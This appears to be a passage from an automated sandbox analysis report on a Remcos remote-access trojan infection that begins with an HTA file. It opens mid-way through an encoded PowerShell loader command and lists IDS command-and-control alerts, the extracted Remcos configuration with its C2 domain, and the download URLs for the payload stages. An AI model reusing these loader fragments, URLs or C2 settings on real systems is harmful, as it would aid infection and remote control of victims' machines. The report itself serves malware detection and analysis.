Zm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViYWNrLnRJRiIsIiRlTlY6QVBQREFUQVxzZWV3aGF0aWFtZG9pbmdmb3J5b3V3aXRoZ3JlYXRuZXNzdGhpbmdzZ2l2ZW5tZWIudmJTIiwwLDApO3NUYXJULVNMRUVwKDMpO0ludk9LZS1leFByZVNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcc2Vld2hhdGlhbWRvaW5nZm9yeW91d2l0aGdyZWF0bmVzc3RoaW5nc2dpdmVubWViLnZiUyI='+[chAr]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1776, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.cmdline", ProcessId: 5748, ProcessName: csc.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Registry Key setAuthor: Joe Security: Data: Details: 0F 2C B3 20 28 7B 10 03 43 97 DA 89 0A C7 84 E1 22 AC 5F C3 43 47 94 70 47 54 74 C8 CA DD E1 F8 3C 65 4D C5 4C 76 6E C5 4D A0 FC 0C F4 E1 F4 D1 AB 9A 7D 4B 25 61 74 B5 AB FA 3C 43 45 9E 2E 6D 0B 58 63 93 89 42 45 5C 54 8C 2B 7E 3B 02 43 59 39 27 9A 2D 69 08 84 E4 FE BA DD D2 D7 7A 29 73 DB 99 1F 66 29 F5 7D E5 F2 8B 15 80 3D FF B2 88 2F E6 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 1776, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-H22KKM\exepath
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-17T07:22:34.828568+010020204251Exploit Kit Activity Detected104.21.84.67443192.168.2.649770TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-17T07:22:34.828568+010020204241Exploit Kit Activity Detected104.21.84.67443192.168.2.649770TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-17T07:22:46.846421+010020365941Malware Command and Control Activity Detected192.168.2.649781192.169.69.262430TCP
                      2024-12-17T07:22:58.336073+010020365941Malware Command and Control Activity Detected192.168.2.649808192.169.69.262430TCP
                      2024-12-17T07:23:09.838732+010020365941Malware Command and Control Activity Detected192.168.2.649837192.169.69.262430TCP
                      2024-12-17T07:23:21.438169+010020365941Malware Command and Control Activity Detected192.168.2.649864192.169.69.262430TCP
                      2024-12-17T07:23:33.104616+010020365941Malware Command and Control Activity Detected192.168.2.649893192.169.69.262430TCP
                      2024-12-17T07:23:44.734225+010020365941Malware Command and Control Activity Detected192.168.2.649920192.169.69.262430TCP
                      2024-12-17T07:23:56.594727+010020365941Malware Command and Control Activity Detected192.168.2.649948192.169.69.262430TCP
                      2024-12-17T07:24:08.295942+010020365941Malware Command and Control Activity Detected192.168.2.649977192.169.69.262430TCP
                      2024-12-17T07:24:19.710724+010020365941Malware Command and Control Activity Detected192.168.2.649995192.169.69.262430TCP
                      2024-12-17T07:24:31.236430+010020365941Malware Command and Control Activity Detected192.168.2.649996192.169.69.262430TCP
                      2024-12-17T07:24:42.850727+010020365941Malware Command and Control Activity Detected192.168.2.649997192.169.69.262430TCP
                      2024-12-17T07:24:54.404510+010020365941Malware Command and Control Activity Detected192.168.2.649998192.169.69.262430TCP
                      2024-12-17T07:25:06.336610+010020365941Malware Command and Control Activity Detected192.168.2.649999192.169.69.262430TCP
                      2024-12-17T07:25:17.732093+010020365941Malware Command and Control Activity Detected192.168.2.650000192.169.69.262430TCP
                      2024-12-17T07:25:29.400873+010020365941Malware Command and Control Activity Detected192.168.2.650001192.169.69.262430TCP
                      2024-12-17T07:25:40.898648+010020365941Malware Command and Control Activity Detected192.168.2.650003192.169.69.262430TCP
                      2024-12-17T07:25:52.532172+010020365941Malware Command and Control Activity Detected192.168.2.650004192.169.69.262430TCP
                      2024-12-17T07:26:04.034079+010020365941Malware Command and Control Activity Detected192.168.2.650005192.169.69.262430TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-17T07:22:15.219733+010020490381A Network Trojan was detected151.101.1.137443192.168.2.649715TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-17T07:22:35.787359+010028582951A Network Trojan was detected104.21.84.67443192.168.2.649770TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-17T07:22:04.164352+010028587951A Network Trojan was detected192.168.2.64970774.208.80.24880TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-17T07:22:34.406542+010028410751Malware Command and Control Activity Detected192.168.2.649770104.21.84.67443TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: kiolokgangan.duckdns.orgAvira URL Cloud: Label: malware
                      Source: 0000000C.00000002.4555889759.0000000001468000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["kiolokgangan.duckdns.org:2430:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-H22KKM", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                      Source: seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.htaVirustotal: Detection: 27%Perma Link
                      Source: seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.htaReversingLabs: Detection: 13%
                      Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.4555889759.0000000001468000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1776, type: MEMORYSTR
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_0043293A
                      Source: powershell.exe, 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_d43b15b4-1

                      Exploits

                      barindex
                      Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1776, type: MEMORYSTR

                      Privilege Escalation

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406764 _wcslen,CoGetObject,12_2_00406764

                      Phishing

                      barindex
                      Source: Yara matchFile source: seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta, type: SAMPLE
                      Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.6:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49770 version: TLS 1.2
                      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: $.NET CLR 3.5.30729.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Bn source: powershell.exe, 00000003.00000002.2235367195.000000000803B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2487654927.0000000004790000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519960382.0000000006CF0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: q:C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.pdb source: powershell.exe, 00000003.00000002.2229203641.0000000004C97000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2487654927.0000000004790000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2519960382.0000000006CF0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2487654927.0000000004790000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: system.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypefa`1hyhxdnlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowhzmicrosoft.win32.taskschedulertaskhuhthwdnlib.dotnet.writermetadataoptionshvhqdnlib.dotnetimdtokenproviderhphshrdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypeilimdnlib.dotnetifullnamecreatorhelperinioihiidnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsijikiddnlib.dotnet.emitiinstructionoperandresolverieigdnlib.utilslazylist`1iaibdnlib.dotnetpropertyattributesicdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamixiydnlib.dotnetclasssigizdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionitiuelemequalitycompareriviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotjojndnlib.dotnet.pdbsymbolreadercreatorjmjldnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerjkjjdnlib.dotnet.mdimagecor20headerjidnlib.dotne
                      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B42F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044D5E9 FindFirstFileExA,12_2_0044D5E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C69
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06

                      Software Vulnerabilities

                      barindex
                      Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.6:49707 -> 74.208.80.248:80
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49781 -> 192.169.69.26:2430
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49808 -> 192.169.69.26:2430
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49837 -> 192.169.69.26:2430
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49864 -> 192.169.69.26:2430
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49893 -> 192.169.69.26:2430
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49920 -> 192.169.69.26:2430
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49948 -> 192.169.69.26:2430
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49995 -> 192.169.69.26:2430
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49999 -> 192.169.69.26:2430
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50004 -> 192.169.69.26:2430
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49998 -> 192.169.69.26:2430
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50000 -> 192.169.69.26:2430
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49997 -> 192.169.69.26:2430
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50001 -> 192.169.69.26:2430
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50005 -> 192.169.69.26:2430
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49996 -> 192.169.69.26:2430
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49977 -> 192.169.69.26:2430
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50003 -> 192.169.69.26:2430
                      Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 104.21.84.67:443 -> 192.168.2.6:49770
                      Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 104.21.84.67:443 -> 192.168.2.6:49770
                      Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 104.21.84.67:443 -> 192.168.2.6:49770
                      Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.1.137:443 -> 192.168.2.6:49715
                      Source: Malware configuration extractorURLs: kiolokgangan.duckdns.org
                      Source: unknownDNS query: name: paste.ee
                      Source: unknownDNS query: name: kiolokgangan.duckdns.org
                      Source: Yara matchFile source: 8.2.powershell.exe.6445e90.1.raw.unpack, type: UNPACKEDPE
                      Source: global trafficHTTP traffic detected: GET /dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /r/3tNKn/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 151.101.1.137 151.101.1.137
                      Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
                      Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
                      Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
                      Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
                      Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
                      Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49770 -> 104.21.84.67:443
                      Source: global trafficHTTP traffic detected: GET /43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 74.208.80.248Connection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.208.80.248
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_047C7A18 URLDownloadToFileW,3_2_047C7A18
                      Source: global trafficHTTP traffic detected: GET /dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /r/3tNKn/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 74.208.80.248Connection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                      Source: global trafficDNS traffic detected: DNS query: paste.ee
                      Source: global trafficDNS traffic detected: DNS query: kiolokgangan.duckdns.org
                      Source: powershell.exe, 00000003.00000002.2229203641.0000000004C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://74.208.80.248/43/seewhati
                      Source: powershell.exe, 00000003.00000002.2233063416.00000000070EF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2233063416.0000000007145000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2233063416.00000000070B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIF
                      Source: powershell.exe, 00000003.00000002.2233063416.0000000007145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFM
                      Source: powershell.exe, 00000003.00000002.2233063416.0000000007145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFY
                      Source: powershell.exe, 00000003.00000002.2233063416.0000000007145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFc
                      Source: powershell.exe, 00000003.00000002.2235184005.0000000007FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFity
                      Source: powershell.exe, 00000003.00000002.2233063416.0000000007145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFo
